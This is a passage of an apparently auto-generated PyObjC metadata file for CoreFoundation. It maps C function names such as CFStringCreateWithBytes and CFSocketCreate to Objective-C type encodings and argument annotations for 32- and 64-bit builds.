b"v^{__CFBag=}^@",
"",
{"arguments": {1: {"c_array_of_variable_length": True, "type_modifier": "o"}}},
),
"CFFileSecuritySetOwnerUUID": (b"Z^{__CFFileSecurity=}^{__CFUUID=}",),
"CFLocaleCreateCanonicalLocaleIdentifierFromScriptManagerCodes": (
b"^{__CFString=}^{__CFAllocator=}ss",
"",
{"retval": {"already_cfretained": True}},
),
"CFDictionaryRemoveValue": (b"v^{__CFDictionary=}@",),
"CFWriteStreamSetClient": (
sel32or64(
b"Z^{__CFWriteStream=}L^?^{_CFStreamClientContext=l^v^?^?^?}",
b"Z^{__CFWriteStream=}Q^?^{_CFStreamClientContext=q^v^?^?^?}",
),
"",
{
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFWriteStream=}"},
1: {"type": b"Q"},
2: {"type": b"^v"},
},
}
}
}
},
),
"CFRunLoopSourceIsValid": (b"Z^{__CFRunLoopSource=}",),
"CFCharacterSetIsCharacterMember": (b"Z^{__CFCharacterSet=}T",),
"CFTreeGetChildCount": (sel32or64(b"l^{__CFTree=}", b"q^{__CFTree=}"),),
"CFURLSetTemporaryResourcePropertyForKey": (b"v^{__CFURL=}^{__CFString=}@",),
"CFConvertDoubleHostToSwapped": (b"{_CFSwappedFloat64=Q}d",),
"CFSetGetValue": (b"@^{__CFSet=}@",),
"CFMessagePortSendRequest": (
sel32or64(
b"l^{__CFMessagePort=}l^{__CFData=}dd^{__CFString=}^^{__CFData=}",
b"i^{__CFMessagePort=}i^{__CFData=}dd^{__CFString=}^^{__CFData=}",
),
"",
{"arguments": {6: {"type_modifier": "o"}}},
),
"CFUUIDGetConstantUUIDWithBytes": (
b"^{__CFUUID=}^{__CFAllocator=}CCCCCCCCCCCCCCCC",
),
"CFSocketCreateRunLoopSource": (
sel32or64(
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFSocket=}l",
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFSocket=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFWriteStreamCreateWithBuffer": (
sel32or64(
b"^{__CFWriteStream=}^{__CFAllocator=}^vl",
b"^{__CFWriteStream=}^{__CFAllocator=}^vq",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFXMLTreeCreateXMLData": (
b"^{__CFData=}^{__CFAllocator=}^{__CFTree=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCopyUserName": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCopyAbsoluteURL": (
b"^{__CFURL=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFNumberGetTypeID": (sel32or64(b"L", b"Q"),),
"CFStringCompareWithOptions": (
sel32or64(
b"l^{__CFString=}^{__CFString=}{_CFRange=ll}L",
b"q^{__CFString=}^{__CFString=}{_CFRange=qq}Q",
),
),
"CFWriteStreamGetTypeID": (sel32or64(b"L", b"Q"),),
"CFSwapInt16": (b"SS",),
"CFDateGetTimeIntervalSinceDate": (b"d^{__CFDate=}^{__CFDate=}",),
"CFAttributedStringGetString": (b"^{__CFString=}^{__CFAttributedString=}",),
"CFURLCopyNetLocation": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringFind": (
sel32or64(
b"{_CFRange=ll}^{__CFString=}^{__CFString=}L",
b"{_CFRange=qq}^{__CFString=}^{__CFString=}Q",
),
),
"CFConvertFloat64HostToSwapped": (b"{_CFSwappedFloat64=Q}d",),
"CFSetReplaceValue": (b"v^{__CFSet=}@",),
"CFURLCreateCopyAppendingPathExtension": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFURL=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFTimeZoneCreate": (
b"^{__CFTimeZone=}^{__CFAllocator=}^{__CFString=}^{__CFData=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCopyScheme": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLParserParse": (b"Z^{__CFXMLParser=}",),
"CFRunLoopRemoveTimer": (b"v^{__CFRunLoop=}^{__CFRunLoopTimer=}^{__CFString=}",),
"CFPreferencesAppValueIsForced": (b"Z^{__CFString=}^{__CFString=}",),
"CFSocketCreate": (
sel32or64(
b"^{__CFSocket=}^{__CFAllocator=}lllL^?^{_CFSocketContext=l^v^?^?^?}",
b"^{__CFSocket=}^{__CFAllocator=}iiiQ^?^{_CFSocketContext=q^v^?^?^?}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
5: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFSocket=}"},
1: {"type": b"Q"},
2: {"type": b"^{__CFData=}"},
3: {"type": b"^v"},
4: {"type": b"^v"},
},
}
}
},
},
),
"CFNotificationCenterGetTypeID": (sel32or64(b"L", b"Q"),),
"CFURLCreateStringByReplacingPercentEscapes": (
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorContainsBit": (
sel32or64(
b"Z^{__CFBitVector=}{_CFRange=ll}L", b"Z^{__CFBitVector=}{_CFRange=qq}I"
),
),
"CFMachPortCreateWithPort": (
sel32or64(
b"^{__CFMachPort=}^{__CFAllocator=}I^?^{_CFMachPortContext=l^v^?^?^?}^Z",
b"^{__CFMachPort=}^{__CFAllocator=}I^?^{_CFMachPortContext=q^v^?^?^?}^Z",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFMachPort=}"},
1: {"type": b"^v"},
2: {"type": b"q"},
3: {"type": b"^v"},
},
}
}
},
},
),
"CFPreferencesAppSynchronize": (b"Z^{__CFString=}",),
"CFFileDescriptorGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBundleCopyBundleLocalizations": (
b"^{__CFArray=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFFileSecurityCreate": (
b"^{__CFFileSecurity=}^{__CFAllocator=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFHash": (sel32or64(b"L@", b"Q@"),),
"CFCharacterSetIntersect": (b"v^{__CFCharacterSet=}^{__CFCharacterSet=}",),
"CFXMLNodeCreateCopy": (
b"^{__CFXMLNode=}^{__CFAllocator=}^{__CFXMLNode=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFArrayCreate": (
sel32or64(
b"^{__CFArray=}^{__CFAllocator=}^^vl^{_CFArrayCallBacks=l^?^?^?^?}",
b"^{__CFArray=}^{__CFAllocator=}^^vq^{_CFArrayCallBacks=q^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFBooleanGetValue": (b"Z^{__CFBoolean=}",),
"CFArrayContainsValue": (
sel32or64(b"Z^{__CFArray=}{_CFRange=ll}@", b"Z^{__CFArray=}{_CFRange=qq}@"),
),
"CFSwapInt32HostToBig": (b"II",),
"CFURLWriteDataAndPropertiesToResource": (
sel32or64(
b"Z^{__CFURL=}^{__CFData=}^{__CFDictionary=}^l",
b"Z^{__CFURL=}^{__CFData=}^{__CFDictionary=}^i",
),
"",
{"arguments": {3: {"type_modifier": "o"}}},
),
"CFArrayInsertValueAtIndex": (sel32or64(b"v^{__CFArray=}l@", b"v^{__CFArray=}q@"),),
"CFDictionaryCreateMutable": (
sel32or64(
b"^{__CFDictionary=}^{__CFAllocator=}l^{_CFDictionaryKeyCallBacks=l^?^?^?^?^?}^{_CFDictionaryValueCallBacks=l^?^?^?^?}",
b"^{__CFDictionary=}^{__CFAllocator=}q^{_CFDictionaryKeyCallBacks=q^?^?^?^?^?}^{_CFDictionaryValueCallBacks=q^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFAllocatorGetTypeID": (sel32or64(b"L", b"Q"),),
"CFReadStreamRead": (
sel32or64(b"l^{__CFReadStream=}^vl", b"q^{__CFReadStream=}^vq"),
"",
{
"arguments": {
1: {
"c_array_length_in_result": True,
"type_modifier": "o",
"c_array_length_in_arg": 2,
}
}
},
),
"CFDataGetBytes": (
sel32or64(b"v^{__CFData=}{_CFRange=ll}^v", b"v^{__CFData=}{_CFRange=qq}^v"),
"",
{"arguments": {2: {"c_array_length_in_arg": 1, "type_modifier": "o"}}},
),
"CFStringCreateWithCharactersNoCopy": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^Tl^{__CFAllocator=}",
b"^{__CFString=}^{__CFAllocator=}^Tq^{__CFAllocator=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFStringGetLongCharacterForSurrogatePair": (sel32or64(b"LTT", b"ITT"),),
"CFSetAddValue": (b"v^{__CFSet=}@",),
"CFFileSecuritySetMode": (b"Z^{__CFFileSecurity=}S",),
"CFURLCreateStringByAddingPercentEscapes": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFString=}^{__CFString=}L",
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFString=}^{__CFString=}I",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetIntValue": (sel32or64(b"l^{__CFString=}", b"i^{__CFString=}"),),
"CFDictionaryGetCountOfValue": (
sel32or64(b"l^{__CFDictionary=}@", b"q^{__CFDictionary=}@"),
),
"CFDataGetMutableBytePtr": (
b"^v^{__CFData=}",
"",
{"retval": {"c_array_of_variable_length": True}},
),
"CFURLCreateAbsoluteURLWithBytes": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^vlL^{__CFURL=}Z",
b"^{__CFURL=}^{__CFAllocator=}^vqI^{__CFURL=}Z",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFBundleOpenBundleResourceFiles": (
sel32or64(b"l^{__CFBundle=}^s^s", b"i^{__CFBundle=}^i^i"),
"",
{"arguments": {1: {"type_modifier": "o"}, 2: {"type_modifier": "o"}}},
),
"CFRunLoopTimerGetInterval": (b"d^{__CFRunLoopTimer=}",),
"CFFileSecurityGetOwner": (
b"Z^{__CFFileSecurity=}^I",
"",
{"arguments": {1: {"type_modifier": "o"}}},
),
"CFCalendarGetIdentifier": (b"^{__CFString=}^{__CFCalendar=}",),
"CFStringCompare": (
sel32or64(b"l^{__CFString=}^{__CFString=}L", b"q^{__CFString=}^{__CFString=}Q"),
),
"CFURLClearResourcePropertyCache": (b"v^{__CFURL=}",),
"CFRunLoopSourceInvalidate": (b"v^{__CFRunLoopSource=}",),
"CFCalendarCreateWithIdentifier": (
b"^{__CFCalendar=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFMachPortGetPort": (b"I^{__CFMachPort=}",),
"CFBinaryHeapRemoveMinimumValue": (b"v^{__CFBinaryHeap=}",),
"CFBagRemoveValue": (b"v^{__CFBag=}@",),
"CFStringReplaceAll": (b"v^{__CFString=}^{__CFString=}",),
"CFArraySetValueAtIndex": (sel32or64(b"v^{__CFArray=}l@", b"v^{__CFArray=}q@"),),
"CFBundleCopyExecutableArchitecturesForURL": (
b"^{__CFArray=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopObserverDoesRepeat": (b"Z^{__CFRunLoopObserver=}",),
"CFDateCompare": (
sel32or64(b"l^{__CFDate=}^{__CFDate=}^v", b"q^{__CFDate=}^{__CFDate=}^v"),
),
"CFGregorianDateIsValid": (
sel32or64(b"Z{_CFGregorianDate=lccccd}L", b"Z{_CFGregorianDate=iccccd}Q"),
),
"CFAutorelease": (b"@@",),
"CFRunLoopTimerInvalidate": (b"v^{__CFRunLoopTimer=}",),
"CFDictionaryGetCountOfKey": (
sel32or64(b"l^{__CFDictionary=}@", b"q^{__CFDictionary=}@"),
),
"CFStringGetCharacterAtIndex": (
sel32or64(b"T^{__CFString=}l", b"T^{__CFString=}q"),
),
"CFStringCreateWithCString": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^tL", b"^{__CFString=}^{__CFAllocator=}^tI"
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFReadStreamCopyError": (
b"^{__CFError=}^{__CFReadStream=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFUserNotificationCheckBoxChecked": (sel32or64(b"Ll", b"Qq"),),
"CFAttributedStringCreate": (
b"^{__CFAttributedString=}^{__CFAllocator=}^{__CFString=}^{__CFDictionary=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringFindWithOptions": (
sel32or64(
b"Z^{__CFString=}^{__CFString=}{_CFRange=ll}L^{_CFRange=ll}",
b"Z^{__CFString=}^{__CFString=}{_CFRange=qq}Q^{_CFRange=qq}",
),
"",
{"arguments": {4: {"type_modifier": "o"}}},
),
"CFSetRemoveAllValues": (b"v^{__CFSet=}",),
"CFArraySortValues": (
sel32or64(b"v^{__CFArray=}{_CFRange=ll}^?@", b"v^{__CFArray=}{_CFRange=qq}^?@"),
"",
{
"arguments": {
2: {
"callable": {
"retval": {"type": b"l"},
"arguments": {
0: {"type": b"@"},
1: {"type": b"@"},
2: {"type": b"@"},
},
},
"callable_retained": False,
}
}
},
),
"CFCalendarGetFirstWeekday": (
sel32or64(b"l^{__CFCalendar=}", b"q^{__CFCalendar=}"),
),
"CFStreamCreatePairWithPeerSocketSignature": (
sel32or64(
b"v^{__CFAllocator=}^{_CFSocketSignature=lll^{__CFData=}}^^{__CFReadStream=}^^{__CFWriteStream=}",
b"v^{__CFAllocator=}^{_CFSocketSignature=iii^{__CFData=}}^^{__CFReadStream=}^^{__CFWriteStream=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
1: {"type_modifier": "n"},
2: {"type_modifier": "o"},
3: {"type_modifier": "o"},
},
},
),
"CFURLSetResourcePropertiesForKeys": (
b"Z^{__CFURL=}^{__CFDictionary=}^^{__CFError=}",
"",
{
"arguments": {
2: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFXMLParserGetLocation": (
sel32or64(b"l^{__CFXMLParser=}", b"q^{__CFXMLParser=}"),
),
"CFStringTokenizerGetCurrentTokenRange": (
sel32or64(
b"{_CFRange=ll}^{__CFStringTokenizer=}",
b"{_CFRange=qq}^{__CFStringTokenizer=}",
),
),
"CFBagContainsValue": (b"Z^{__CFBag=}@",),
"CFUUIDCreateWithBytes": (
b"^{__CFUUID=}^{__CFAllocator=}CCCCCCCCCCCCCCCC",
"",
{"retval": {"already_cfretained": True}},
),
"CFArrayGetCount": (sel32or64(b"l^{__CFArray=}", b"q^{__CFArray=}"),),
"CFArrayCreateMutableCopy": (
sel32or64(
b"^{__CFArray=}^{__CFAllocator=}l^{__CFArray=}",
b"^{__CFArray=}^{__CFAllocator=}q^{__CFArray=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFSetSetValue": (b"v^{__CFSet=}@",),
"CFSwapInt64HostToBig": (b"QQ",),
"CFCharacterSetUnion": (b"v^{__CFCharacterSet=}^{__CFCharacterSet=}",),
"CFFileSecurityCopyGroupUUID": (
b"Z^{__CFFileSecurity=}^^{__CFUUID=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"type_modifier": "o"}},
},
),
"CFAttributedStringSetAttribute": (
sel32or64(
b"v^{__CFAttributedString=}{_CFRange=ll}^{__CFString=}@",
b"v^{__CFAttributedString=}{_CFRange=qq}^{__CFString=}@",
),
),
"CFReadStreamOpen": (b"Z^{__CFReadStream=}",),
"CFXMLNodeGetVersion": (sel32or64(b"l^{__CFXMLNode=}", b"q^{__CFXMLNode=}"),),
"CFStringCreateWithBytesNoCopy": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^tlLZ^{__CFAllocator=}",
b"^{__CFString=}^{__CFAllocator=}^tqIZ^{__CFAllocator=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFBundleGetTypeID": (sel32or64(b"L", b"Q"),),
"CFURLDestroyResource": (
sel32or64(b"Z^{__CFURL=}^l", b"Z^{__CFURL=}^i"),
"",
{"arguments": {1: {"type_modifier": "o"}}},
),
"CFBagSetValue": (b"v^{__CFBag=}@",),
"CFURLWriteBookmarkDataToFile": (
sel32or64(
b"Z^{__CFData=}^{__CFURL=}L^^{__CFError=}",
b"Z^{__CFData=}^{__CFURL=}Q^^{__CFError=}",
),
"",
{
"arguments": {
3: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFFileDescriptorCreateRunLoopSource": (
sel32or64(
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFFileDescriptor=}l",
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFFileDescriptor=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFGetTypeID": (sel32or64(b"L@", b"Q@"),),
"CFURLCopyFragment": (
b"^{__CFString=}^{__CFURL=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFWriteStreamCreateWithFile": (
b"^{__CFWriteStream=}^{__CFAllocator=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAbsoluteTimeGetDifferenceAsGregorianUnits": (
sel32or64(
b"{_CFGregorianUnits=llllld}dd^{__CFTimeZone=}L",
b"{_CFGregorianUnits=iiiiid}dd^{__CFTimeZone=}Q",
),
),
"CFReadStreamCreateWithFile": (
b"^{__CFReadStream=}^{__CFAllocator=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleCopyLocalizedString": (
b"^{__CFString=}^{__CFBundle=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFErrorCopyRecoverySuggestion": (
b"^{__CFString=}^{__CFError=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCreateBookmarkData": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}^{__CFURL=}L^{__CFArray=}^{__CFURL=}^^{__CFError=}",
b"^{__CFData=}^{__CFAllocator=}^{__CFURL=}Q^{__CFArray=}^{__CFURL=}^^{__CFError=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
5: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
},
},
),
"CFStringCreateWithBytes": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^tlLZ",
b"^{__CFString=}^{__CFAllocator=}^tqIZ",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFRunLoopSourceGetOrder": (
sel32or64(b"l^{__CFRunLoopSource=}", b"q^{__CFRunLoopSource=}"),
),
"CFBundleLoadExecutable": (b"Z^{__CFBundle=}",),
"CFStringCreateCopy": (
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCreateFilePathURL": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFURL=}^^{__CFError=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
},
},
),
"CFUserNotificationDisplayNotice": (
sel32or64(
b"ldL^{__CFURL=}^{__CFURL=}^{__CFURL=}^{__CFString=}^{__CFString=}^{__CFString=}",
b"idQ^{__CFURL=}^{__CFURL=}^{__CFURL=}^{__CFString=}^{__CFString=}^{__CFString=}",
),
),
"CFUserNotificationGetResponseValue": (
sel32or64(
b"^{__CFString=}^{__CFUserNotification=}^{__CFString=}l",
b"^{__CFString=}^{__CFUserNotification=}^{__CFString=}q",
),
),
"CFRunLoopContainsTimer": (b"Z^{__CFRunLoop=}^{__CFRunLoopTimer=}^{__CFString=}",),
"CFPreferencesSetValue": (
b"v^{__CFString=}@^{__CFString=}^{__CFString=}^{__CFString=}",
),
"CFReadStreamGetStatus": (
sel32or64(b"l^{__CFReadStream=}", b"q^{__CFReadStream=}"),
),
"CFCopyTypeIDDescription": (
sel32or64(b"^{__CFString=}L", b"^{__CFString=}Q"),
"",
{"retval": {"already_cfretained": True}},
),
"CFConvertFloatHostToSwapped": (b"{_CFSwappedFloat32=I}f",),
"CFCalendarDecomposeAbsoluteTime": (
b"Z^{__CFCalendar=}d^c",
"",
{"variadic": True},
),
"CFBinaryHeapCreate": (
sel32or64(
b"^{__CFBinaryHeap=}^{__CFAllocator=}l^{_CFBinaryHeapCallBacks=l^?^?^?^?}^{_CFBinaryHeapCompareContext=l^v^?^?^?}",
b"^{__CFBinaryHeap=}^{__CFAllocator=}q^{_CFBinaryHeapCallBacks=q^?^?^?^?}^{_CFBinaryHeapCompareContext=q^v^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateExternalRepresentation": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}^{__CFString=}LC",
b"^{__CFData=}^{__CFAllocator=}^{__CFString=}IC",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFDateFormatterCreateISO8601Formatter": (
b"^{__CFDateFormatter=}^{__CFAllocator=}Q",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateWithFormat": (
b"^{__CFString=}^{__CFAllocator=}^{__CFDictionary=}^{__CFString=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {2: {"printf_format": True}},
"variadic": True,
},
),
"CFBundleCopyResourceURLsOfTypeForLocalization": (
b"^{__CFArray=}^{__CFBundle=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFConvertFloat32HostToSwapped": (b"{_CFSwappedFloat32=I}f",),
"CFRunLoopObserverCreateWithHandler": (
sel32or64(
b"^{__CFRunLoopObserver=}^{__CFAllocator=}LZl@?",
b"^{__CFRunLoopObserver=}^{__CFAllocator=}QZq@?",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
4: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^v"},
1: {"type": b"^{__CFRunLoopObserver=}"},
2: {"type": sel32or64(b"I", b"Q")},
},
},
"block": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFRunLoopObserver=}"},
1: {"type": b"L"},
},
},
}
},
},
),
"CFDataCreate": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}^vl", b"^{__CFData=}^{__CFAllocator=}^vq"
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFSwapInt16HostToLittle": (b"SS",),
"CFSetCreate": (
sel32or64(
b"^{__CFSet=}^{__CFAllocator=}^^vl^{_CFSetCallBacks=l^?^?^?^?^?}",
b"^{__CFSet=}^{__CFAllocator=}^^vq^{_CFSetCallBacks=q^?^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFGregorianDateGetAbsoluteTime": (
sel32or64(
b"d{_CFGregorianDate=lccccd}^{__CFTimeZone=}",
b"d{_CFGregorianDate=iccccd}^{__CFTimeZone=}",
),
),
"CFStringGetListOfAvailableEncodings": (
sel32or64(b"^L", b"^I"),
"",
{"retval": {"c_array_of_variable_length": True}},
),
"CFRunLoopTimerGetContext": (
sel32or64(
b"v^{__CFRunLoopTimer=}^{_CFRunLoopTimerContext=l^v^?^?^?}",
b"v^{__CFRunLoopTimer=}^{_CFRunLoopTimerContext=q^v^?^?^?}",
),
),
"CFXMLParserAbort": (
sel32or64(
b"v^{__CFXMLParser=}l^{__CFString=}", b"v^{__CFXMLParser=}q^{__CFString=}"
),
),
"CFPropertyListCreateFromXMLData": (
sel32or64(
b"@^{__CFAllocator=}^{__CFData=}L^^{__CFString=}",
b"@^{__CFAllocator=}^{__CFData=}Q^^{__CFString=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {3: {"type_modifier": "o"}},
},
),
"CFStringFindAndReplace": (
sel32or64(
b"l^{__CFString=}^{__CFString=}^{__CFString=}{_CFRange=ll}L",
b"q^{__CFString=}^{__CFString=}^{__CFString=}{_CFRange=qq}Q",
),
),
"CFDictionaryGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBundleGetDevelopmentRegion": (b"^{__CFString=}^{__CFBundle=}",),
"CFBundleGetMainBundle": (b"^{__CFBundle=}",),
"CFXMLNodeCreate": (
sel32or64(
b"^{__CFXMLNode=}^{__CFAllocator=}l^{__CFString=}^vl",
b"^{__CFXMLNode=}^{__CFAllocator=}q^{__CFString=}^vq",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleUnloadExecutable": (b"v^{__CFBundle=}",),
"CFArrayGetCountOfValue": (
sel32or64(b"l^{__CFArray=}{_CFRange=ll}@", b"q^{__CFArray=}{_CFRange=qq}@"),
),
"CFRunLoopTimerIsValid": (b"Z^{__CFRunLoopTimer=}",),
"CFConvertFloat64SwappedToHost": (b"d{_CFSwappedFloat64=Q}",),
"CFReadStreamHasBytesAvailable": (b"Z^{__CFReadStream=}",),
"CFDataSetLength": (sel32or64(b"v^{__CFData=}l", b"v^{__CFData=}q"),),
"CFStringTokenizerCreate": (
sel32or64(
b"^{__CFStringTokenizer=}^{__CFAllocator=}^{__CFString=}{_CFRange=ll}L^{__CFLocale=}",
b"^{__CFStringTokenizer=}^{__CFAllocator=}^{__CFString=}{_CFRange=qq}Q^{__CFLocale=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFMachPortGetTypeID": (sel32or64(b"L", b"Q"),),
"CFTreeGetChildAtIndex": (
sel32or64(b"^{__CFTree=}^{__CFTree=}l", b"^{__CFTree=}^{__CFTree=}q"),
),
"CFSwapInt16BigToHost": (b"SS",),
"CFStringCreateWithCharacters": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^Tl", b"^{__CFString=}^{__CFAllocator=}^Tq"
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFUserNotificationCreateRunLoopSource": (
sel32or64(
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFUserNotification=}^?l",
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFUserNotification=}^?q",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFUserNotification=}"},
1: {"type": sel32or64(b"i", b"q")},
},
},
"function_pointer_retained": True,
}
},
},
),
"CFStringTrimWhitespace": (b"v^{__CFString=}",),
"CFMessagePortCreateRemote": (
b"^{__CFMessagePort=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringDelete": (
sel32or64(b"v^{__CFString=}{_CFRange=ll}", b"v^{__CFString=}{_CFRange=qq}"),
),
"CFBundleCopyResourceURLInDirectory": (
b"^{__CFURL=}^{__CFURL=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFTreeFindRoot": (b"^{__CFTree=}^{__CFTree=}",),
"CFLocaleCopyDisplayNameForPropertyValue": (
b"^{__CFString=}^{__CFLocale=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringTokenizerGetTypeID": (sel32or64(b"L", b"Q"),),
"CFSocketGetSocketFlags": (sel32or64(b"L^{__CFSocket=}", b"Q^{__CFSocket=}"),),
"CFLocaleGetLanguageLineDirection": (
sel32or64(b"l^{__CFString=}", b"q^{__CFString=}"),
),
"CFCopyHomeDirectoryURL": (
b"^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFUUIDCreateFromString": (
b"^{__CFUUID=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFPreferencesCopyApplicationList": (
b"^{__CFArray=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFErrorCopyUserInfo": (
b"^{__CFDictionary=}^{__CFError=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFMachPortIsValid": (b"Z^{__CFMachPort=}",),
"CFCalendarComposeAbsoluteTime": (b"Z^{__CFCalendar=}^d^c", "", {"variadic": True}),
"CFReadStreamUnscheduleFromRunLoop": (
b"v^{__CFReadStream=}^{__CFRunLoop=}^{__CFString=}",
),
"CFDictionaryGetValue": (b"@^{__CFDictionary=}@",),
"CFReadStreamCreateWithBytesNoCopy": (
sel32or64(
b"^{__CFReadStream=}^{__CFAllocator=}^vl^{__CFAllocator=}",
b"^{__CFReadStream=}^{__CFAllocator=}^vq^{__CFAllocator=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFSwapInt32LittleToHost": (b"II",),
"CFBinaryHeapRemoveAllValues": (b"v^{__CFBinaryHeap=}",),
"CFWriteStreamGetStatus": (
sel32or64(b"l^{__CFWriteStream=}", b"q^{__CFWriteStream=}"),
),
"CFURLCreateFileReferenceURL": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFURL=}^^{__CFError=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
},
},
),
"CFRunLoopObserverGetActivities": (
sel32or64(b"L^{__CFRunLoopObserver=}", b"Q^{__CFRunLoopObserver=}"),
),
"CFTimeZoneCreateWithTimeIntervalFromGMT": (
b"^{__CFTimeZone=}^{__CFAllocator=}d",
"",
{"retval": {"already_cfretained": True}},
),
"CFPropertyListCreateWithStream": (
